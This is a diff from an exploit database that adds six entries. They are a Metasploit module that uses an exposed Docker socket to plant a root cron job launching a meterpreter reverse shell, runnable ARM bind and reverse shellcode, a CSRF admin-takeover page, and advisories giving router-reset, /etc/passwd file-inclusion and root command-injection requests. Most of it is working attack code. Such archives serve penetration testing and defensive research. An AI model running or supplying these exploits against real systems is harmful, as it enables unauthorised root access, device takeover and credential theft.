DB: 2017-09-12

6 new exploits

Docker Daemon - Unprotected TCP Socket (Metasploit)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)
FiberHome ADSL AN1020-25 - Improper Access Restrictions
WiseGiga NAS - Multiple Vulnerabilities

files.csv

@@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port
 42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
 42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
 42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
+42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port
 42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
+42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
+42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port
 42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
 42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
 42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
+42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
+42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0

platforms/arm/shellcode/42646.c

@@ -0,0 +1,89 @@
+/*
+
+##################################
+# Andrea Sindoni - @invictus1306 #
+##################################
+
+This schellcode is part of my episodes:
+- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
+
+Enviroment: Raspberry pi 3
+
+Default settings for port:4444
+
+@.syntax unified
+.global _start
+_start:
+ 
+  mov r1, #0x5C           @ r1=0x5c
+  mov r5, #0x11           @ r5=0x11
+  mov r1, r1, lsl #24     @ r1=0x5c000000
+  add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me
+  add r1, #2              @ r1=0x5c110002 - sin_family+sin_port
+  sub r2, r2, r2          @ sin_addr
+  push {r1, r2}           @ push into the stack r1 and r2
+  mov r1, sp              @ save pointer to sockaddr_in struct
+  mov r2, #0x10           @ addrlen
+  mov r0, r6              @ mov sockfd into r0
+  ldr r7, =#282           @ bind syscall 
+  swi 0
+ 
+  @ listen for incoming connections via SYS_LISTEN
+  @ int listen(int sockfd, int backlog);
+ 
+  mov r0, r6    @ mov sockfd into r0
+  mov r1, #1    @ backlog=1
+  ldr r7, =#284 @ listen syscall
+  swi 0
+ 
+  @ Accept connections
+  @ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
+ 
+  mov r0, r6     @ mov sockfd into r0
+  sub r1, r1, r1 @ addr=0
+  sub r2, r2, r2 @ addrlen=0
+  ldr r7, =#285  @ accept syscall
+  swi 0
+ 
+  @ Redirect stdin, stdout and stderr via dup2
+ 
+  mov r1, #2       @ counter stdin(0), stdout(1) and stderr(2)
+  loop:
+    mov r7, #63    @ dup2 syscall
+    swi 0
+    sub r1, r1, #1 @ decrement counter
+    cmp r1, #-1    @ compare r1 with -1
+    bne loop       @ if the result is not equal jmp to loop
+ 
+  @ int execve(const char *filename, char *const argv[],char *const envp[]);
+  mov r0, pc
+  add r0, #32
+  sub r2, r2, r2
+  push {r0, r2}
+  mov r1, sp
+  mov r7, #11
+  swi 0
+ 
+_exit:
+  mov r0, #0
+  mov r7, #1
+  swi 0  @ exit(0)
+ 
+.asciz "/bin/sh"
+
+Assemble and link it:
+as -o bind.o bind.s
+ld -o bind bind.o
+*/
+
+#include <stdio.h>
+
+char *code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00";
+
+int main(void) {
+
+  (*(void(*)()) code)();
+
+  return 0;
+  
+}

platforms/arm/shellcode/42647.c

@@ -0,0 +1,71 @@
+/*
+
+##################################
+# Andrea Sindoni - @invictus1306 #
+##################################
+
+This schellcode is part of my episodes:
+- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
+
+Enviroment: Raspberry pi 3
+
+Default settings for port:4444 ip:192.168.0.12
+
+.global _start
+_start:
+
+  mov    r1, #0x5C            @ r1=0x5c
+  mov    r5, #0x11            @ r5=0x11 
+  mov    r1, r1, lsl #24      @ r1=0x5c000000
+  add    r1, r1, r5, lsl #16  @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
+  add    r1, #2               @ r1=0x5c110002 - sin_family+sin_port
+  ldr    r2, =#0x0c00a8c0     @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me
+  push   {r1, r2}             @ push into the stack r1 and r2
+  mov    r1, sp               @ save pointer to sockaddr_in struct
+ 
+  mov   r2, #0x10             @ addrlen
+  mov   r0, r6                @ mov sockfd into r0
+  ldr   r7, =#283             @ connect syscall
+  swi   0 
+
+  @ Redirect stdin, stdout and stderr via dup2 
+  mov    r1, #2              @ counter stdin(0), stdout(1) and stderr(2)
+  loop:
+    mov    r0, r6            @ mov sockfd into r0
+    mov    r7, #63           @ dup2 syscall
+    swi    0    
+    sub    r1, r1, #1        @ decrement counter
+    cmp    r1, #-1           @ compare r1 with -1
+    bne    loop              @ if the result is not equal jmp to loop
+
+  @ int execve(const char *filename, char *const argv[],char *const envp[]);
+
+  mov    r0, pc
+  add    r0, #32
+  sub    r2, r2, r2
+  push   {r0, r2}
+  mov    r1, sp
+  mov    r7, #11
+  swi    0
+
+_exit:
+  mov    r0, #0
+  mov    r7, #1
+  swi    0           @ exit(0)
+
+shell:    .asciz "/bin/sh"
+
+
+Assemble and link it:
+as -o reverse_shell.o reverse_shell.s
+ld -o reverse_shell reverse_shell.o
+*/
+
+#include <stdio.h>
+
+char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00";
+
+int main(void) {
+  (*(void(*)()) code)();
+  return 0;
+}

platforms/hardware/webapps/42649.txt

@@ -0,0 +1,135 @@
+Title:
+====
+
+FiberHome Unauthenticated ADSL Router Factory Reset.
+
+Credit:
+======
+
+Name: Ibad Shah
+Twitter: @BeeFaauBee09
+Website: beefaaubee09.github.io
+
+
+CVE:
+=====
+
+CVE-2017-14147
+
+Date:
+====
+
+05-09-2017 (dd/mm/yyyy)
+
+About FiberHome:
+======
+
+FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
+
+Products & Services:
+Wireless 3G/4G broadband devices
+Custom engineered technologies
+Broadband devices
+
+URL : http://www.fiberhomegroup.com/
+
+
+Description:
+=======
+
+This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. 
+
+
+
+Affected Device Model:
+=============
+
+FiberHome ADSL AN1020-25
+
+
+Exploitation-Technique:
+===================
+
+Remote
+
+
+Details:
+=======
+
+Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
+
+1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
+
+Vulnerable restoreinfo.cgi
+
+
+
+Proof Of Concept:
+================
+
+PoC : 
+
+GET /restoreinfo.cgi HTTP/1.1
+Host: 192.168.1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Connection: close
+
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Sat, 01 Jan 2000 00:12:39 GMT
+Content-Type: text/html
+Connection: close
+
+<html>
+<head>
+<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
+<link rel=stylesheet href='stylemain.css' type='text/css'>
+<link rel=stylesheet href='colors.css' type='text/css'>
+<script language="javascript">
+<!-- hide
+
+function restore() {
+   var enblPopWin = '0';
+   var loc = 'main.html';
+   var code = 'window.top.location="' + loc + '"';
+
+   if ( enblPopWin == '1' ) {
+      loc = 'index.html';
+      code = 'location="' + loc + '"';
+   }
+
+   eval(code);
+}
+
+function frmLoad() {
+   setTimeout("restore()", 60000);
+}
+
+// done hiding -->
+</script>
+</head>
+
+<body onLoad='frmLoad()'>
+<blockquote>
+<b>DSL Router Restore</b><br><br>
+The DSL Router configuration has been restored to default settings and the
+router is rebooting.<br><br>
+Close the DSL Router Configuration window and wait for 2 minutes before
+reopening your web browser. If necessary, reconfigure your PC's IP address to
+match your new configuration.
+</blockquote>
+</body>
+</html>
+
+
+
+Credits:
+=======
+
+Ibad Shah, Taimooor Zafar, Owais Mehtab

platforms/hardware/webapps/42651.txt

@@ -0,0 +1,171 @@
+Source: https://blogs.securiteam.com/index.php/archives/3402
+
+Vulnerabilities summary
+The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices.
+
+WiseGiga is a Korean company selling NAS products.
+
+The vulnerabilities found in WiseGiga NAS are:
+
+Pre-Authentication Local File Inclusion (4 different vulnerabilities)
+Post-Authentication Local File Inclusion
+Remote Command Execution as root
+Remote Command Execution as root with CSRF
+Info Leak
+Default accounts
+
+
+Credit
+An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
+
+
+Vendor response
+We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
+
+
+Vulnerabilities details
+
+Pre-Authentication Local File Inclusion
+User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
+
+By sending GET request to the following URI’s with filename= as a parameter, an attacker can trigger the vulnerabilities:
+
+/webfolder/download_file1.php
+down_data.php
+download_file.php
+mobile/download_file1.php
+
+
+Proof of Concept
+http://IP/webfolder/download_file1.php?filename=/etc/passwd
+http://IP/down_data.php?filename=/etc/passwd
+http://IP/download_file.php?filename=base64(/etc/passwd)
+http://IP/mobile/download_file1.php?filename=base64(/etc/passwd)
+
+Post-Authentication Local File Inclusion
+User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
+
+By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability.
+
+
+Proof of Concept
+http://IP//mobile/download_file2.php?filename=base64(/etc/passwd)
+
+
+Remote Command Execution as root
+The WiseGiga NAS firmware contain pre.php files in the different directories.
+
+For example:
+/app_data/apache/htdocs/auto/pre.php
+/app_data/apache/htdocs/admin/iframe/pre.php
+/app_data/apache/htdocs/admin/pre.php
+/app_data/apache/htdocs/mobile/pre.php
+/app_data/apache/htdocs/wiseapp/config/pre.php
+/app_data/apache/htdocs/pre.php
+/home/htdocs/webfolder/pre.php
+/ub/update/init/pre.php
+/tmp/home/root/htdocs/auto/pre.php
+/tmp/home/root/htdocs/pre.php
+
+
+A “standard” pre.php contains:
+
+    181 [...]
+    182 function  auth()
+    183 { 
+    184  global $memberid;
+    185  session_start();
+    186 //echo $memberid;
+    187  if($memberid=="root")
+    188  {
+    189   // print<<<__DATA_OF_HTML__
+    190   //<script language="JavaScript">
+    191   //  alert("sucess !");
+    192   //</script>
+    193 //__DATA_OF_HTML__;
+    194  }
+    195  else
+    196  {
+    197   print<<<__DATA_OF_HTML__
+    198   <script language="JavaScript">
+    199     alert("\xc0\xce\xc1\xf5\xb9\xde\xc1\xf6 \xbe\xca\xc0\xba \xbb\xe7\xbf\xeb\xc0\xda\xc0\xd4\xb4\xcf\xb4\xd9!");
+    200 //    location.href='/admin/';
+    201       window.open('index.php','_parent');
+    202     exit;
+    203   </script>
+    204 __DATA_OF_HTML__;
+    205  }
+    206
+    207 }
+
+
+Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request:
+
+GET /webpage[...]?memberid=root&[...] HTTP/1.0
+
+
+The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen():
+
+23 function root_exec_cmd($cmd)
+24 {
+25         $tmpfile=fopen("/tmp/ramdisk/cmd.list","w");
+26         fwrite($tmpfile,$cmd);
+27         fclose($tmpfile);
+28         popen("/tmp/ramdisk/ramush","r");
+29 }
+
+By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands
+
+The WiseGiga NAS run’s the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root.
+
+
+Proof of Concept
+By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function:
+
+178 if($cmd == "add")
+179 {
+180         add_system();
+181 }
+
+The add_system() function uses global for $group_name and $user_data.
+
+Then it will pass the user controlled input and will run it as root:
+
+145 function add_system()
+146 {
+147         global $group_name,$user_data;
+148
+149     if(add_conf()==1)
+150     {
+151 //====================================================================================
+152         root_exec_cmd("addgroup $group_name");
+
+
+An attacker can get unauthenticated RCE as root by sending the following request:
+
+http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a
+
+The file /tmp/a will contain:
+
+uid=0(root) gid=48(apache) groups=48(apache)
+
+
+Remote Command Execution as root with CSRF
+There is no CSRF protection in WiseGiga NAS.
+
+An attacker can force the execution of a command as root when the victim visits the malicious website.
+
+
+Proof of Concept
+Once the victim visit the attacker’s website with the following code, the attacker can execute arbitrary commands.
+
+<img src="http://192.168.1.1/admin/group.php?memberid=root&cmd=add&group_name=d;COMMANDTOEXECUTE">
+
+
+InfoLeak
+accessing http://IP/webfolder/config/config.php will disclose the PHP configuration.
+
+
+Default accounts
+Username: guest
+Password: guest09#$

platforms/php/webapps/42648.html

@@ -0,0 +1,35 @@
+<!--
+# # # # # 
+# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
+# Dork: N/A
+# Date: 11.09.2017
+# Vendor Homepage: http://ranksol.com/
+# Software Link: http://www.mojomarketplace.com/item/nimble-pro
+# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# 
+# Proof of Concept:
+-->
+<html>
+<body>
+<label>Edit Profile:</label>
+<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
+<label>Admin Name:</label>
+<input type="text" name="name" style="width: 400px;" value="Admin">
+<label>Admin Email:</label>
+<input type="text" name="email" style="width: 400px;" value="a@a.com">
+<label>Admin Password:</label>
+<input type="text" name="pass" style="width: 400px;" value="efe">
+<button type="submit" class="btn  btn-success" >Save Profile</button>
+<input type="hidden" name="cmd" value="save_profile">
+</form>
+</body>
+</html>

platforms/python/remote/42650.rb

@@ -0,0 +1,207 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'Docker Daemon - Unprotected TCP Socket Exploit',
+      'Description'      => %q{
+        Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
+        with tls but without tls-auth), an attacker can create a Docker
+        container with the '/' path mounted with read/write permissions on the
+        host server that is running the Docker container. As the Docker
+        container executes command as uid 0 it is honored by the host operating
+        system allowing the attacker to edit/create files owned by root. This
+        exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
+        the host server.
+
+        The Docker image should exist on the target system or be a valid image
+        from hub.docker.com.
+      },
+      'Author'           => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
+      'License'          => MSF_LICENSE,
+      'References'       => [
+        ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
+        ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
+      ],
+      'DisclosureDate'   => 'Jul 25, 2017',
+      'Targets'          => [
+        [ 'Python', {
+          'Platform'     => 'python',
+          'Arch'         => ARCH_PYTHON,
+          'Payload'      => {
+            'Compat'     => {
+              'ConnectionType' => 'reverse noconn none tunnel'
+            }
+          }
+        }]
+      ],
+      'DefaultOptions'   => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
+      'DefaultTarget'    => 0))
+
+    register_options(
+      [
+        Opt::RPORT(2375),
+        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
+        OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
+      ]
+    )
+  end
+
+  def check_image(image_id)
+    vprint_status("Check if images exist on the target host")
+    res = send_request_raw(
+      'method'  => 'GET',
+      'uri'     => normalize_uri('images', 'json')
+    )
+    return unless res and res.code == 200 and res.body.include? image_id
+
+    res
+  end
+
+  def pull_image(image_id)
+    print_status("Trying to pulling image from docker registry, this may take a while")
+    res = send_request_raw(
+      'method'  => 'POST',
+      'uri'     => normalize_uri('images', 'create?fromImage=' + image_id)
+    )
+    return unless res.code == 200
+
+    res
+  end
+
+  def make_container_id
+    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
+
+    rand_text_alpha_lower(8)
+  end
+
+  def make_cmd(mnt_path, cron_path, payload_path)
+    vprint_status('Creating the docker container command')
+    echo_cron_path = mnt_path + cron_path
+    echo_payload_path = mnt_path + payload_path
+
+    cron_command = "python #{payload_path}"
+    payload_data = payload.raw
+
+    command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
+    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
+    command << "echo \"\" >> #{echo_cron_path} && "
+    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
+
+    command
+  end
+
+  def make_container(mnt_path, cron_path, payload_path)
+    vprint_status('Setting container json request variables')
+    {
+      'Image'       => datastore['DOCKERIMAGE'],
+      'Cmd'         => make_cmd(mnt_path, cron_path, payload_path),
+      'Entrypoint'  => %w[/bin/sh -c],
+      'HostConfig' => {
+        'Binds'    => [
+          '/:' + mnt_path
+        ]
+      }
+    }
+  end
+
+  def del_container(container_id)
+    send_request_raw(
+      {
+        'method'  => 'DELETE',
+        'uri'     => normalize_uri('containers', container_id)
+      },
+      1 # timeout
+    )
+  end
+
+  def check
+    res = send_request_raw(
+      'method'   => 'GET',
+      'uri'      => normalize_uri('containers', 'json'),
+      'headers'  => { 'Accept' => 'application/json' }
+    )
+
+    if res.nil?
+      print_error('Failed to connect to the target')
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res and res.code == 200 and res.headers['Server'].include? 'Docker'
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # check if target is vulnerable
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::Unknown, 'Failed to connect to the target')
+    end
+
+    # check if image is not available, pull it or fail out
+    image_id = datastore['DOCKERIMAGE']
+    if check_image(image_id).nil?
+      fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
+    end
+
+    # create required information to create json container information.
+    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
+    payload_path = '/tmp/' + rand_text_alpha(8)
+    mnt_path = '/mnt/' + rand_text_alpha(8)
+    container_id = make_container_id
+
+    # create container
+    res_create = send_request_raw(
+      'method'  => 'POST',
+      'uri'     => normalize_uri('containers', 'create?name=' + container_id),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data'    => make_container(mnt_path, cron_path, payload_path).to_json
+    )
+    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
+
+    print_status("The docker container is created, waiting for deploy")
+    register_files_for_cleanup(cron_path, payload_path)
+
+    # start container
+    send_request_raw(
+      {
+        'method'  => 'POST',
+        'uri'     => normalize_uri('containers', container_id, 'start')
+      },
+      1 # timeout
+    )
+
+    # wait until container stopped
+    vprint_status("Waiting until the docker container stopped")
+    res_wait = send_request_raw(
+      'method'  => 'POST',
+      'uri'     => normalize_uri('containers', container_id, 'wait'),
+      'headers' => { 'Accept' => 'application/json' }
+    )
+
+    # delete container
+    deleted_container = false
+    if res_wait.code == 200
+      vprint_status("The docker container has been stopped, now trying to remove it")
+      del_container(container_id)
+      deleted_container = true
+    end
+
+    # if container does not deploy, remove it and fail out
+    unless deleted_container
+      del_container(container_id)
+      fail_with(Failure::Unknown, "The docker container failed to deploy")
+    end
+    print_status('Waiting for the cron job to run, can take up to 60 seconds')
+  end
+end